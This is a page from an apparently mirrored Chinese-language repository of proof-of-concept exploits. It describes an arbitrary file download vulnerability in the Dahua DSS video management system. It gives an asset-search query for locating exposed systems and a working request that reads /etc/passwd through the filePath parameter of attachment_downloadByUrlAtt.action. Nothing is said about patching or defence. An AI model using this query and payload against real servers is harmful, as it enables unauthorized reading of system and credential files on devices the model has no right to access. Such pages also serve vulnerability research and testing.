admin/POC
1
0
Fork 0
mirror of https://github.com/eeeeeeeeee-code/POC.git synced 2025-11-07 11:26:58 +00:00
Code Issues Packages Projects Releases Wiki Activity
POC/wpoc/大华/大华DSS视频管理系统/大华DSS视频管理系统attachment_downloadByUrlAtt.action任意文件下载漏洞.md
eeeeeeeeee-code 06c8413e64 first commit
2025-03-04 23:12:57 +08:00

1.0 KiB
Raw Blame History

大华 DSS 视频管理系统 attachment_downloadByUrlAtt.action 任意文件下载漏洞

一、漏洞简介

大华 DSS 视频管理系统存在任意文件下载漏洞,攻击者通过漏洞可以下载服务器上的任意文件

二、影响版本

  • 大华 DSS 视频管理系统

三、资产测绘

  • hunterapp.name=="Dahua 大华 DSS 视频管理系统"

1691867182224-1219c86f-cf8f-45b6-a1cf-8161c98567cc.png

  • 登录页面

1691867201317-4728fc1e-bdf3-485b-a82a-67995f73e590.png

四、漏洞复现

/portal/attachment_downloadByUrlAtt.action?filePath=file:///etc/passwd

1692014263697-ee82b115-ec78-4aa1-89bd-220bac635887.png

更新: 2024-02-29 23:57:19
原文: https://www.yuque.com/xiaokp7/ocvun2/mb3iwwsxiz2bvrek